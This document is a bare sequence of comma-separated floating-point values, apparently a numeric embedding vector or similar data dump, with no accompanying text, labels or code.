0.014649508520960808, -0.0016874518478289247, 0.0024659563787281513, 0.022240133956074715, -0.017481038346886635, 0.021269703283905983, 0.010741200298070908, 0.006204771343618631, 0.008335065096616745, 0.01119982823729515, 0.001582765020430088, 0.02687958814203739, -0.03198431804776192, 0.027491092681884766, 0.013798720203340054, -0.023861948400735855, 0.023649251088500023, 0.010069875046610832, -0.0023945034481585026, 0.04083783179521561, 0.02932560443878174, 0.007451042998582125, -0.019488366320729256, -0.015181250870227814, 0.027358155697584152, -0.00033192368573509157, -0.001388346659950912, -0.0005579143180511892, 0.013512908481061459, 0.01772032119333744, -0.011791392229497433, 0.008634170517325401, -0.026081973686814308, -0.015274305827915668, -0.009637834504246712, 0.028607752174139023, -0.023941710591316223, -0.015234425663948059, 0.027225220575928688, -0.012210139073431492, 0.008215422742068768, 0.019833998754620552, 0.03807276859879494, 0.00024925434263423085, -0.03381882980465889, 0.0656702071428299, 0.006832892540842295, -0.016404258087277412, -0.014503278769552708, 0.006945887580513954, 0.035015251487493515, -0.0063210902735590935, -0.028076007962226868, 0.03504183515906334, 0.007869790308177471, 0.0057394965551793575, 0.0631178468465805, 0.003359948517754674, -0.0057494668290019035, 0.02057843841612339, 0.04599573463201523, 0.004440050572156906, 0.0011066892184317112, 0.03190455585718155, -0.015646526589989662, -0.02932560443878174, 0.017215166240930557, -0.013506261631846428, 0.029485126957297325, 0.03770054876804352, 0.0333668477833271, -0.001787984510883689, -0.014263994991779327, -0.029883934184908867, -0.02029927261173725, 0.01944848522543907, 0.009145972318947315, -0.024327224120497704, 0.010169576853513718, -0.01972765102982521, 0.02258576638996601, -0.01429058238863945, -0.004044567234814167, -0.042246948927640915, -0.004317085258662701, -0.011877800337970257, -0.041289813816547394, 0.017401276156306267, -0.016643542796373367, 0.005008350592106581, -0.0006709095905534923, -0.0041442690417170525, 0.017015762627124786, 0.0022582444362342358, -0.04323067143559456, -0.019594714045524597, -0.019302256405353546, 0.013486321084201336, -0.014463398605585098, -0.023782188072800636, -0.002234980696812272, 0.029511714354157448, 0.004619513638317585, -0.037275154143571854, -0.0333668477833271, -0.004828887525945902, 0.011851212941110134, -0.02002010866999626, 0.0008171388180926442, 0.00361917307600379, -0.012741881422698498, 0.003429739736020565, 0.013692371547222137, 0.013612610287964344, 0.051977839320898056, -0.026919469237327576, 0.023848654702305794, 0.027358155697584152, 0.0017813376616686583, 0.002377886325120926, -0.015035022050142288, 0.004845504183322191, 0.002781678456813097, 0.00336991879157722, 0.01569969952106476, -0.010741200298070908, -0.020737960934638977, -0.01118653453886509, -0.027384743094444275, -0.010541796684265137, -0.010634851641952991, 0.012083850800991058, -0.012043969705700874, -0.024925433099269867, 0.01951495371758938, 0.0027318275533616543, -0.003014315851032734, 0.042911626398563385, -0.010894075967371464, 0.00961789395660162, 0.017215166240930557, -0.020139750093221664, -0.019581420347094536, -0.028714099898934364, 0.0025074987206608057, -0.003213719232007861, 0.01935543119907379, -0.018358413130044937, -0.0184913482517004, 0.024513334035873413, -0.0033267145045101643, -0.004064507316797972, 0.0033350230660289526, -0.01253583189100027, -0.00657034432515502, 0.029033144935965538, 0.02257247269153595, -0.0041874730959534645, -0.0005670536193065345, 0.01764056086540222, -0.025776222348213196, 0.009983466938138008, -0.013213803060352802, 0.000504740048199892, 0.001992373028770089, -0.004280528053641319, -0.005656411871314049, -0.008800339885056019, -0.040545374155044556, -0.008248656988143921, 0.009558073244988918, 0.0254305899143219, 0.0004602896806318313, 0.0003620419302023947, -0.004639454185962677, -0.0358128622174263, -0.012363015674054623, 0.013944949023425579, -0.016749892383813858, -0.009737536311149597, -0.01153216790407896, -0.018717339262366295, 0.011465699411928654, 0.05684328451752663, 0.010801021009683609, -0.02210719883441925, -0.03227677568793297, -0.026746653020381927, 0.010967191308736801, -0.02181473933160305, -0.02465956285595894, 0.034350570291280746, -0.01818559691309929, 0.007078823167830706, 0.006819598842412233, -0.004343672189861536, 0.0015138046583160758, -0.03560016676783562, -0.020139750093221664, 0.019129440188407898, 0.026361139491200447, 0.016922708600759506, -0.001474754884839058, 0.030468851327896118, 0.005550063215196133, 0.004197442904114723, -0.00999676063656807, 0.007843202911317348, 0.014622921124100685, -0.02972441166639328, 0.024526627734303474, 0.0029312309343367815, 0.012223432771861553, -0.01583263650536537, -0.01963459514081478, -0.027969660237431526, -0.012123730964958668, 0.022705407813191414, 0.014755857177078724, -0.030734721571207047, -0.004150915425270796, -0.020059989765286446, 0.008368299342691898, -0.004307114984840155, -0.02229330874979496, 0.017693735659122467, -0.03924260288476944, 0.015646526589989662, -0.015659818425774574, -0.04267234355211258, 0.023277031257748604, -0.00019867648370563984, -0.006583638023585081, 0.013127394951879978, -0.007982785813510418, -0.011937621049582958, 0.03621166944503784, -0.02572304755449295, 0.008587642572820187, -0.035493817180395126, 0.027756962925195694, 0.012436130084097385, -0.003105709096416831, 0.0012487642234191298, -0.0008005218696780503, 0.009823944419622421, -0.0027883253060281277, -0.024845672771334648, -0.00471256859600544, -0.00919250026345253, 0.007683680392801762, -0.0037188746500760317, -0.019195906817913055, 0.02657383680343628, -0.0011789730051532388, -0.020990539342164993, 0.011545460671186447, 0.007384575437754393, 0.014649508520960808, -0.004011332988739014, -0.01371895894408226, 0.0010776096023619175, -0.004051214084029198, 0.051472682505846024, -0.022599060088396072, 0.038046181201934814, 0.00867405068129301, -0.011306176893413067, 0.01665683649480343, -0.011066893115639687, 0.023183977231383324, 0.017933018505573273, 0.005397187080234289, 0.00383519334718585, -0.01648402027785778, 0.005918959621340036, -0.009671068750321865, 0.0078166164457798, -0.02524447999894619, 0.028714099898934364, 0.024925433099269867, 0.01637767255306244, -0.03230336308479309, 0.032356537878513336, -0.04642112925648689, 0.012828290462493896, -0.02447345294058323, 0.0041342987678945065, 0.004569662734866142, -0.003301789052784443, -0.0036856408696621656, -0.01780008338391781, 0.012309840880334377, 0.011698337271809578, 0.022054024040699005, -0.004626160487532616, -0.002347975969314575, 0.01742786355316639, 0.008089134469628334, -0.01219684537500143, -0.004260587505996227, -0.006424115039408207, 0.012063910253345966, -0.02192108891904354, 0.025550231337547302, -0.008906688541173935, -0.03525453433394432, -0.004400169942528009, 0.015513590537011623, -0.025417296215891838, 0.0093919038772583, -0.0656702071428299, 0.0013733913656324148, -0.002347975969314575, -0.003539411583915353, -0.05317426100373268, 0.02714546024799347, 0.01838500052690506, -0.04198107868432999, -0.008474647998809814, 0.0041442690417170525, 0.004509842023253441, -0.0258958637714386, 0.025404002517461777, -0.009059564210474491, -0.004160885699093342, 0.008880101144313812, 0.00697912136092782, 0.04083783179521561, -0.03057519905269146, 0.030734721571207047, -0.0011083509307354689, -0.040545374155044556, 0.002436045790091157, 0.03304780274629593, 0.0036291431169956923, -0.01528759952634573, -0.014263994991779327, -0.010880783200263977, 0.0021153385750949383, 0.00919914711266756, -0.02552364394068718, -0.047006044536828995, -0.022638941183686256, -0.004586279857903719, -0.007962845265865326, 0.0014182572485879064, -0.016842946410179138, -0.005433744750916958, -0.013812013901770115, 0.01138593815267086, 0.03304780274629593, 0.0031023856718093157, -0.008421473205089569, 0.020711373537778854, -0.05256275460124016, 0.0160985067486763, 0.02257247269153595, -0.009843884967267513, -0.020698079839348793, -0.012097143568098545, -0.025364121422171593, 0.0008042606641538441, 0.03240971267223358, -0.05838533490896225, -0.0069060069508850574, 0.02354290336370468, 0.025749634951353073, 0.020698079839348793, -0.014038003981113434, -0.030894244089722633, 0.009564720094203949, 0.0005599914002232254, 0.020977245643734932, 0.017268341034650803, -0.010462035425007343, -0.03153233602643013, -0.033872004598379135, -0.006563697475939989, -0.026228202506899834, -0.008315124548971653, -0.004642777610570192, 0.010820961557328701, -0.059608343988657, 0.015739580616354942, -0.004769066348671913, -0.0024244138039648533, -0.03203749284148216, 0.007630506064742804, -0.0034962075296789408, 0.019222494214773178, -0.027570853009819984, -0.03352637216448784, -0.005320749245584011, 0.003246953245252371, -0.0006409990601241589, -0.020166337490081787, -0.022333187982439995, -0.001096719061024487, 0.03692952170968056, -0.020352447405457497, -0.004386876244097948, -0.021960968151688576, 0.004921942483633757, 0.014038003981113434, 0.010342393070459366, 0.003592585911974311, -0.021110180765390396, 0.012868170626461506, 0.0003256923519074917, -0.03514818474650383, 0.026254789903759956, -0.016829652711749077, -0.012283253483474255, -0.001766382367350161, -0.03772713616490364, 0.0016816359711810946, 0.035866037011146545, -0.01982070505619049, 0.013366679660975933, 0.004842180758714676, -0.008846867829561234, -0.03496207669377327, -0.025124836713075638, -0.0263079646974802, -0.011066893115639687, 0.035201359540224075, -0.025084957480430603, 0.0013443117495626211, 0.010083168745040894, 0.032143838703632355, 0.0033416699152439833, -0.003100723959505558, -0.005480272229760885, 0.0019159350777044892, 0.012482657097280025, 0.018983211368322372, -0.0388437956571579, 0.0499306283891201, -0.022240133956074715, 0.006756454240530729, 0.004160885699093342, 0.010681379586458206, -0.03801959380507469, -0.028740687295794487, -0.010289219208061695, -0.028341880068182945, 0.00838159304112196, 0.032914865761995316, 0.023649251088500023, 0.021641923114657402, -0.0070123556070029736, -0.0012022367445752025, -0.012688707560300827, -0.004087771289050579, -0.005583296995609999, -0.007371281739324331, -0.03703587129712105, -0.005560033489018679, 0.007956198416650295, 0.01665683649480343, -0.02991052158176899, -0.0031838088762015104, 0.032622408121824265, -0.005277545191347599, 0.00011122974683530629, -0.01466280221939087, -0.03182479366660118, 0.0012579035246744752, 0.026826413348317146, -0.020232805982232094, 0.006703279912471771, 0.018039368093013763, 0.005812611430883408, 0.015247718431055546, 0.006613548379391432, 0.006430761888623238, 0.014489986002445221, 0.0005599914002232254, -0.008348358795046806, 0.02153557538986206, -0.01980741135776043, -0.010668085888028145, 0.028368467465043068, 0.019102852791547775, 0.00234465254470706, -0.03451009467244148, -0.0026703448966145515, 0.003261908423155546, -0.0001805016800062731, 0.015566764399409294, 0.00981729757040739, -0.012921345420181751, 0.0014357049949467182, 0.015447122044861317, 0.010355686768889427, 0.04166203364729881, 0.0014814016176387668, 0.0020505322609096766, -0.011279589496552944, -0.02277187630534172, -0.0131539823487401, 0.009531485848128796, 0.02134946547448635, -0.0031688534654676914, -0.006680016405880451, 0.025762928649783134, -0.02286493219435215, -0.03203749284148216, -0.010867489501833916, -0.0004769066290464252, 0.0006119193858467042, 0.009032977744936943, 0.0066933101043105125, 0.009411843493580818, -0.019116146489977837, -0.014317168854176998, -0.01620485633611679, 0.0415290966629982, -0.0027318275533616543, 0.022811757400631905, 0.009983466938138008, 0.004390199668705463, -0.01686953380703926, -0.018597697839140892, 0.008148955181241035, 0.0030608433298766613, 0.010634851641952991, -0.043124325573444366, -0.008780399337410927, 0.028607752174139023, -0.014383637346327305, -0.015274305827915668, 0.004400169942528009, -0.008986449800431728, -0.023223858326673508, -0.0031688534654676914, -0.0016450786497443914, -0.04913301393389702, 0.02733157016336918, 0.01799948699772358, 0.08103757351636887, 0.007304813712835312, 0.025842690840363503, -0.0031140176579356194, -0.04067830741405487, 0.009671068750321865, -0.004995056893676519, 0.01676318608224392, 0.002618832280859351, 0.0017913078190758824, 0.009657775051891804, -0.018690751865506172, -0.005008350592106581, 0.013625903986394405, 0.0034795906394720078, -0.013552789576351643, 0.026520662009716034, -0.01219684537500143, 0.00020719267195090652, -0.009936939924955368, 0.0012554110726341605, 0.01944848522543907, 0.013406559824943542, -0.030920831486582756, 0.01914273388683796, -0.006440732162445784, -0.021695097908377647, 0.012130377814173698, 0.007637152913957834, 0.0003603802470024675, -0.025669872760772705, -0.0015528545482084155, 0.0016874518478289247, 0.01195756159722805, 0.00521772401407361, 0.0285811647772789, 0.01801278069615364, 0.012748528271913528, 0.0021568809170275927, -0.0331275649368763, -0.004576309584081173, -0.031080354005098343, -0.004789006896317005, -0.005795994307845831, 0.005174519959837198, -0.027570853009819984, 0.015566764399409294, 0.0063011497259140015, 0.01725504733622074, -0.021096887066960335, -0.004596250131726265, -0.0012122069019824266, -0.0013393266126513481, 0.03421763703227043, -0.015114783309400082, -0.02002010866999626, -0.015540177002549171, -0.007318107411265373, -0.001156540121883154, -0.041688621044158936, 0.01291469857096672, -0.010442094877362251, 0.014423517510294914, 0.02866092510521412, -0.0013675754889845848, -0.012429483234882355, -0.007677033543586731, 0.03246288374066353, -0.01866416446864605, 0.0006463995669037104, 0.012868170626461506, -0.010368980467319489, 0.017560798674821854, -0.013399912975728512, 0.017294928431510925, 0.010448741726577282, -0.005513506010174751, -0.0014456751523539424, -0.026613716036081314, -0.016071919351816177, 0.03286169096827507, 0.0300966314971447, 0.009797357022762299, -0.025656580924987793, 0.003871750785037875, 0.0033931825309991837, 0.00576608395203948, 0.00942513719201088, 0.0016990837175399065, -0.023928416892886162, 0.023795481771230698, 0.0023529608733952045, 0.014742563478648663, 0.018531229346990585, 0.00518781365826726, 0.0015453769592568278, 0.0010933957528322935, -0.0010086492402479053, -0.0010767787462100387, -0.01043544802814722, 0.010528502985835075, 0.007198465522378683, 0.02733157016336918, 0.005815934389829636, -0.00314392801374197, 0.012422836385667324, 0.014024711214005947, 0.0011291222181171179, -0.0007917979382909834, -0.0007332231616601348, -0.010701319202780724, -0.007065529469400644, -0.004370259586721659, -0.03552040457725525, 0.004396846517920494, -0.007803322747349739, 0.00011569555499590933, 0.028129182755947113, 0.0005554217495955527, -0.006125010084360838, -0.01722845993936062, -0.017029056325554848, 0.024034764617681503, -0.009923646226525307, -0.005965487100183964, 0.010681379586458206, 0.0031788237392902374, -0.023370087146759033, 0.014370343647897243, 0.008248656988143921, 0.04011997953057289, -0.008361652493476868, 0.007976138964295387, 0.0018810394685715437, 0.0445600301027298, -0.011405878700315952, 0.01310745533555746, 0.009897058829665184, 0.005267574917525053, -0.022412950173020363, 0.01600545272231102, 0.028155770152807236, 0.00905291736125946, 0.023782188072800636, 0.017667148262262344, 0.01991376094520092, 0.021003833040595055, 0.006061865482479334, 0.03201090544462204, 0.0028381759766489267, 0.0022815081756561995, -0.01665683649480343, 0.02687958814203739, 0.026347845792770386, -0.0007539943908341229, -0.014609627425670624, 0.009079504758119583, -0.028448227792978287, -0.018252065405249596, 0.03517477214336395, 0.004260587505996227, 0.021469106897711754, 0.005137962754815817, 0.025736341252923012, 0.01329356525093317, 0.00648061279207468, -0.018637577071785927, -0.047112394124269485, 0.0014556453097611666, -0.018597697839140892, -0.01781337708234787, 0.014742563478648663, -0.034722790122032166, -0.00229978677816689, 0.014450104907155037, 0.009352022781968117, -0.021867914125323296, -0.011658456176519394, 0.011724923737347126, 0.01471597608178854, -0.014038003981113434, -0.00452645868062973, -0.0342973954975605, -0.017188578844070435, 0.011372644454240799, -0.035307709127664566, 0.01290805172175169, 0.013074221089482307, -0.0369826965034008, 0.013944949023425579, 0.01314733549952507, 0.027304982766509056, -0.029750997200608253, -0.01875722035765648, -0.016457432880997658, -0.030335914343595505, 0.007770088501274586, -0.0007116211345419288, -0.007437749300152063, -0.026148442178964615, -0.0069591812789440155, 0.0033798888325691223, -0.007484276778995991, -0.0003686887212097645, 0.007756795268505812, -0.013625903986394405, 0.021602042019367218, 0.0020787811372429132, -0.01677647791802883, -0.003276863833889365, -0.02371571958065033, 0.001139092375524342, -0.020551851019263268, 0.02161533571779728, -0.003944865427911282, 0.026746653020381927, 0.004868768155574799, -0.04588938504457474, 0.0163909662514925, 0.006410821806639433, -0.015553470700979233, 0.009358669631183147, 0.0004802300245501101, -0.0004411801928654313, -0.023503022268414497, 0.003991392906755209, 0.03389859199523926, 0.005360629875212908, -0.03352637216448784, 0.002371239708736539, -0.00804925337433815, 0.021641923114657402, 0.03703587129712105, 0.009272261522710323, -0.0021884532179683447, -0.008587642572820187, 0.012097143568098545, 0.010036641731858253, 0.022080611437559128, -0.02657383680343628, 0.0044433739967644215, 0.03001686930656433, -0.010707966051995754, -0.019009796902537346, -0.02525777369737625, -0.00019078342302236706, 0.010741200298070908, 0.003914954606443644, -0.013453087769448757, 0.020219512283802032, -0.027132166549563408, 0.01504831574857235, -0.004576309584081173, 0.00023596077517140657, -0.012210139073431492, 0.015606645494699478, 0.02410123310983181, -0.013486321084201336, 0.012788409367203712, -0.0012603960931301117, 0.008341711945831776, -0.021176649257540703, -0.01466280221939087, -0.0028946737293154, -0.013080867938697338, -0.007796675898134708, -0.03326049819588661, 0.008953215554356575, -0.017361395061016083, 0.01894333027303219, -0.00664345920085907, 0.011724923737347126, -0.004925265908241272, -0.011159948073327541, 0.002932892646640539, 0.002193438122048974, 0.019887173548340797, -0.006879419554024935, -0.0039016613736748695, 0.009072857908904552, -0.0006812951760366559, 0.05609884485602379, 0.0027201958000659943, -0.005447037983685732, 0.006307796575129032, -0.006726543884724379, -0.020432209596037865, -0.013612610287964344, -0.00799607951194048, -0.024991901591420174, 0.016351085156202316, 0.012987812981009483, -0.012010735459625721, -0.030548611655831337, 0.010920663364231586, 0.02552364394068718, -0.016922708600759506, 0.03134622424840927, -0.0042107366025447845, -0.01371895894408226, 0.019408604130148888, 0.015686405822634697, 0.030841071158647537, 0.011605282314121723, -0.0018993180710822344, 0.0056962925009429455, -0.013187216594815254, -0.007185171823948622, 0.02562999352812767, -0.010368980467319489, 0.02019292488694191, -0.019129440188407898, 0.001766382367350161, -0.025497056543827057, 0.008328418247401714, 0.02343655563890934, -0.017494332045316696, 0.0034264163114130497, -0.016989175230264664, 0.003516147844493389, 0.017321515828371048, 0.0019425221253186464, -0.010588324628770351, -0.02056514471769333, -0.00027542604948394, 0.005786024034023285, 0.022319896146655083, 0.012050616554915905, -0.002229995559900999, 0.010608265176415443, 0.026560543105006218, -0.0024277372285723686, 0.015938984230160713, 0.00045239663450047374, 0.005131315905600786, -0.013060927391052246, -0.01608521305024624, 0.02075125463306904, 0.0029844052623957396, -0.00461619021371007, -0.020405622199177742, 0.02533753402531147, 0.008328418247401714, 0.0031472514383494854, 0.01734810136258602, 0.015300893224775791, 0.012974519282579422, 0.007457689847797155, -0.01181797869503498, -0.003192117204889655, -0.037301741540431976, 0.011419172398746014, -0.0010294204112142324, -0.008527821861207485, 0.002628802554681897, 0.017175285145640373, -0.004184149671345949, 0.008016019128262997, -0.02799624763429165, -0.01171827781945467, -0.028049422428011894, -0.006590284872800112, 0.008474647998809814, 0.003258584998548031, -0.007477630395442247, 0.013446440920233727, -0.015938984230160713, -0.02048538252711296, -0.010674732737243176, -0.013984830118715763, -0.011658456176519394, 0.006470642518252134, -0.004044567234814167, 0.020352447405457497, -0.00666672270745039, -0.0041342987678945065, 0.01991376094520092, -0.019488366320729256, -0.021854620426893234, 0.023941710591316223, -0.005918959621340036, -0.025417296215891838, -0.010781081393361092, -0.02411452680826187, -0.042619168758392334, 0.00006532541010528803, -0.01782667078077793, 0.00550021231174469, -0.018557816743850708, -0.0051014055497944355, -0.0015437152469530702, -0.013891775161027908, -0.009411843493580818, 0.033872004598379135, -0.009491605684161186, -0.012994459830224514, 0.017015762627124786, 0.002598891966044903, 0.002587259979918599, -0.0011091817868873477, 0.0037720489781349897, 0.020059989765286446, -0.014210821129381657, 0.010176223702728748, -0.016922708600759506, 0.0036557302810251713, -0.006341030355542898, -0.025178011506795883, 0.020511969923973083, 0.020618319511413574, 0.02334349974989891, -0.007351341191679239, 0.022359775379300117, -0.008873454295098782, -0.00977077055722475, -0.029857346788048744, -0.018704045563936234, -0.010202811099588871, -0.010521856136620045, 0.014157646335661411, -0.0072582862339913845, -0.011226415634155273, 0.0022183635737746954, -0.01589910313487053, 0.004702598322182894, 0.013891775161027908, 0.00697912136092782, -0.020804429426789284, 0.011864506639540195, 0.03246288374066353, 0.004440050572156906, 0.030123217031359673, 0.009119385853409767, 0.0054437145590782166, -0.0008503727149218321, -0.01980741135776043, 0.004091094713658094, -0.0036922877188771963, 0.0115786949172616, -0.015779461711645126, 0.01490208599716425, 0.0038651039358228445, -0.012462716549634933, 0.00016045747906900942, 0.021974261850118637, -0.0025822750758379698, 0.00867405068129301, -0.0007261610007844865, -0.010648145340383053, -0.016736598685383797, 0.024885553866624832, -0.01552688330411911, 0.0021884532179683447, -0.004280528053641319, 0.004749125801026821, 0.011744864284992218, 0.005563356913626194, -0.0038385167717933655, 0.007770088501274586, 0.000902300700545311, 0.012476010248064995, -0.01906297169625759, 0.026892881840467453, -0.01295457873493433, 0.016231441870331764, 0.013399912975728512, -0.024247461929917336, -0.02162862941622734, -0.014157646335661411, -0.019674476236104965, 0.004895355086773634, -0.014131058938801289, 0.013386620208621025, -0.00697912136092782, 0.007803322747349739, -0.009684361517429352, 0.007570685353130102, -0.007470983546227217, 0.004669364541769028, -0.0069392407312989235, 0.014184233732521534, 0.012456070631742477, 0.017933018505573273, 0.012170258909463882, -0.0069591812789440155, 0.03924260288476944, 0.00881363358348608, 0.019222494214773178, -0.012063910253345966, 0.009338729083538055, 0.009371963329613209, 0.0037421383894979954, -0.016231441870331764, 0.008468001149594784, 0.01801278069615364, 0.0004553046019282192, -0.019927052780985832, 0.01581934280693531, 0.014809031039476395, 0.011073539033532143, -0.009837238118052483, 0.008202129043638706, 0.01789313741028309, -0.027491092681884766, 0.018145715817809105, -0.018132422119379044, 0.004928589332848787, 0.013931656256318092, 0.022705407813191414, 0.0025556879118084908, 0.005237664561718702, 0.011080185882747173, -0.004160885699093342, 0.01572628691792488, 0.0026985935401171446, -0.004828887525945902, 0.012243373319506645, 0.0036291431169956923, 0.004386876244097948, -0.023356793448328972, 0.000029676844860659912, -0.00020272686379030347, 0.008640817366540432, -0.020325860008597374, -0.020325860008597374, 0.006593608297407627, -0.016178268939256668, 0.011844566091895103, -0.008182189427316189, 0.008514528162777424, -0.005221047438681126, -0.008946568705141544, -0.00676310108974576, -0.0403592623770237, -0.009531485848128796, 0.008959862403571606, 0.0254305899143219, -0.023290324956178665, 0.007118703797459602, -0.008494587615132332, 0.013944949023425579, -0.019581420347094536, 0.009777416475117207, 0.003984746057540178, -0.005832551512867212, -0.00685947947204113, 0.019953640177845955, -0.035866037011146545, -0.0057494668290019035, 0.019980227574706078, 0.001895994646474719, 0.01133276429027319, 0.0013958242489024997, -0.008846867829561234, -0.019554832950234413, -0.0036158496513962746, -0.004243970382958651, 0.005064848344773054, 0.01062155794352293, 0.015407241880893707, -0.017401276156306267, 0.015061608515679836, 0.02505837008357048, 0.0016508945263922215, -0.005872432142496109, 0.016603661701083183, -0.0011906048748642206, 0.004240646958351135, -0.018424881622195244, -0.01858440414071083, 0.003526118118315935, -0.009544779546558857, -0.02638772688806057, 0.009119385853409767, 0.004586279857903719, 0.007889730855822563, -0.037009283900260925, -0.0022399656008929014, 0.01648402027785778, -0.008986449800431728, 0.009219086728990078, 0.006211418192833662, -0.01491537969559431, -0.01935543119907379, 0.002819897374138236, -0.017494332045316696, -0.006444055587053299, -0.0056630587205290794, -0.021761566400527954, 0.0013160628732293844, -0.0091858534142375, 0.009458371438086033, -0.03227677568793297, -0.004440050572156906, -0.008202129043638706, -0.002035577083006501, -0.01510148961097002, 0.008600936271250248, 0.006686663255095482, 0.019408604130148888, 0.006041925400495529, 0.008919982239603996, -0.013160629197955132, 0.004130975343286991, 0.017560798674821854, 0.008919982239603996, 0.010973838157951832, 0.01371895894408226, -0.002706902101635933, -0.01215031836181879, 0.013612610287964344, -0.020990539342164993, 0.006158243864774704, 0.0003790743066929281, -0.021362759172916412, 0.003413122845813632, 0.008680697530508041, 0.009857178665697575, 0.0001394785795127973, -0.03355295583605766, 0.011811332777142525, 0.01357937604188919, 0.01944848522543907, 0.019581420347094536, 0.005905666388571262, -0.00843476690351963, 0.01894333027303219, -0.008215422742068768, 0.002987728687003255, 0.0025723048020154238, -0.0021469106432050467, -0.002268214477226138, 0.015500296838581562, -0.005872432142496109, 0.001992373028770089, 0.015035022050142288, 0.012422836385667324, 0.02535082772374153, -0.013552789576351643, 0.0068860664032399654, 0.003609202802181244, -0.029219254851341248, 0.022466124966740608, -0.0075440979562699795, 0.0007024818332865834, -0.012449423782527447, 0.0030658284667879343, -0.013134041801095009, -0.017467744648456573, 0.004812270402908325, 0.016497313976287842, 0.019023090600967407, -0.009318788535892963, 0.007796675898134708, 0.005214400589466095, -0.02362266555428505, -0.013825307600200176, -0.00800937321037054, -0.002063825959339738, 0.020312566310167313, 0.0006883573951199651, -0.016723304986953735, 0.004852151032537222, 0.001927566947415471, 0.016736598685383797, 0.023875242099165916, -0.0026271408423781395, -0.0013526201946660876, 0.0051446096040308475, 0.009744183160364628, -0.011851212941110134, 0.034536682069301605, 0.0015221132198348641, 0.01486220583319664, -0.00009855932148639113, 0.012814996764063835, -0.00819548312574625, -0.0032934807240962982, -0.02182803303003311, 0.005835874937474728, 0.005799317732453346, 0.004194119479507208, 0.020033402368426323, 0.004612866789102554, 0.002301448490470648, -0.006500553339719772, -0.014569747261703014, 0.005460331682115793, 0.009278908371925354, -0.006826245691627264, 0.00975747685879469, -0.013772132806479931, 0.0014489985769614577, -0.016616955399513245, 0.007025648839771748, -0.041103702038526535, -0.009258967824280262, 0.011877800337970257, 0.01611180044710636, 0.01791972480714321, 0.011990795843303204, -0.009212440811097622, -0.013838601298630238, 0.014516572467982769, -0.014795737341046333, 0.00645734928548336, 0.0011033659102395177, 0.007457689847797155, -0.00023326052178163081, -0.012589005753397942, 0.020259393379092216, -0.00497844023630023, 0.02562999352812767, -0.004140945617109537, 0.017029056325554848, -0.0019691092893481255, 0.010162930004298687, -0.019209200516343117, -0.004061183892190456, -0.010555090382695198, -0.01137929130345583, 0.0009313803748227656, -0.010548443533480167, -0.03746126592159271, 0.002075457712635398, -0.00033400082611478865, -0.0003900830342900008, -0.010368980467319489, -0.019594714045524597, 0.01452986616641283, 0.014809031039476395, -0.004925265908241272, 0.0285811647772789, -0.0034696203656494617, -0.000021160654796403833, 0.004985086619853973, 0.010302512906491756, -0.0160985067486763, 0.018238771706819534, -0.0016874518478289247, 0.024726031348109245, 0.009883765131235123, -0.0022582444362342358, -0.007537451107054949, 0.004636130761355162, -0.009365316480398178, -0.008993096649646759, 0.013167276047170162, 0.00042040899279527366, 0.006483936216682196, -0.01429058238863945, -0.010362333618104458, 0.003828546730801463, -0.0017098847310990095, 0.007603919133543968, 0.007304813712835312, 0.004679334815591574, 0.001970771001651883, 0.010368980467319489, 0.003398167435079813, 0.0036224965006113052, 0.022027436643838882, 0.008069193921983242, -0.0016525562386959791, 0.013040986843407154, 0.014410223811864853, 0.010601618327200413, -0.006327736657112837, -0.02372901327908039, -0.003815253032371402, 0.014822324737906456, 0.001484725042246282, 0.01657707616686821, -0.014250701293349266, 0.024805791676044464, 0.00386842736043036, 0.00673983758315444, -0.01486220583319664, 0.0007211758638732135, 0.005221047438681126, -0.0019807410426437855, -0.01490208599716425, -0.016922708600759506, 0.01200408861041069, -0.0014157646801322699, -0.029112907126545906, 0.007982785813510418, -0.003878397634252906, 0.012682060711085796, -0.008534468710422516, -0.0045297821052372456, -0.003403152571991086, 0.004277204629033804, -0.004998380318284035, 0.013360032811760902, 0.003203749191015959, 0.016457432880997658, 0.006573667749762535, 0.0021834680810570717, 0.016510607674717903, 0.0028099273331463337, 0.00402130326256156, 0.008793693035840988, 0.009903705678880215, 0.011445758864283562, -0.010422155261039734, 0.002922922605648637, 0.018517935648560524, 0.015566764399409294, 0.002602215390652418, -0.005151256453245878, -0.0032536000944674015, -0.016311204060912132, -0.01390506885945797, 0.003288495587185025, -0.0020671493839472532, -0.015938984230160713, 0.026640303432941437, 0.014064591377973557, 0.011671749874949455, 0.023955004289746284, -0.026361139491200447, 0.030548611655831337, 0.003825223306193948, 0.005599914118647575, -0.025576818734407425, 0.01770702749490738, -0.017387982457876205, -0.00723834615200758, -0.006347677204757929, -0.006121686659753323, 0.007929611019790173, 0.004450020845979452, -0.01990046724677086, -0.03320732340216637, 0.026361139491200447, -0.002944524632766843, -0.015314186923205853, 0.0032818487379699945, 0.02791648544371128, -0.014795737341046333, -0.011631868779659271, 0.02818235754966736, 0.016789771616458893, -0.0004231092461850494, -0.007005708757787943, -0.007404515519738197, 0.013220449909567833, -0.004041243810206652, 0.004609543364495039, 0.0016234766226261854, -0.000702066405210644, 0.005005027167499065, 0.013193863444030285, 0.01171163097023964, -0.00585581548511982, -0.0076172128319740295, -0.010721259750425816, 0.013998123817145824, 0.005776053760200739, 0.01990046724677086, 0.011512227356433868, 0.007603919133543968, 0.009591306559741497, -0.021070299670100212, 0.005955516826361418, -0.015925690531730652, -0.004184149671345949, -0.019887173548340797, 0.01991376094520092, -0.01043544802814722, 0.010216104798018932, 0.032542645931243896, 0.0028747334145009518, -0.004366936162114143, -0.018797101452946663, -0.007623859215527773, 0.01601874642074108, -0.03964141011238098, -0.004011332988739014, 0.003595909336581826, 0.0022167018614709377, 0.014848912134766579, -0.005340689793229103, -0.013060927391052246, -0.015646526589989662, 0.005646441597491503, 0.009126032702624798, 0.010874136351048946, -0.007770088501274586, -0.01528759952634573, 0.02562999352812767, -0.0002627556095831096, 0.01752091757953167, -0.0033582868054509163, 0.030601786449551582, -0.019767530262470245, -0.014024711214005947, -0.008075840771198273, 0.008767105638980865, -0.008321771398186684, -0.007058883085846901, -0.0038119296077638865, 0.006826245691627264, 0.022147078067064285, 0.013386620208621025, -0.0123364282771945, -0.021003833040595055, -0.0025855982676148415, 0.019860586151480675, 0.021376052871346474, 0.003364933654665947, -0.0029578180983662605, -0.010980484075844288, 0.021282996982336044, 0.011033658869564533, -0.010468682274222374, 0.007118703797459602, -0.005958840250968933, 0.005347336642444134, 0.01724175363779068, 0.0060053677298128605, -0.009784063324332237, -0.0035360881593078375, -0.005958840250968933, -0.00905291736125946, -0.0011955900117754936, -0.008707284927368164, -0.0072449930012226105, -0.01980741135776043, -0.012874817475676537, 0.014729269780218601, 0.0010850871913135052, 0.009471665136516094, -0.007464336697012186, 0.008062547072768211, 0.009013037197291851, 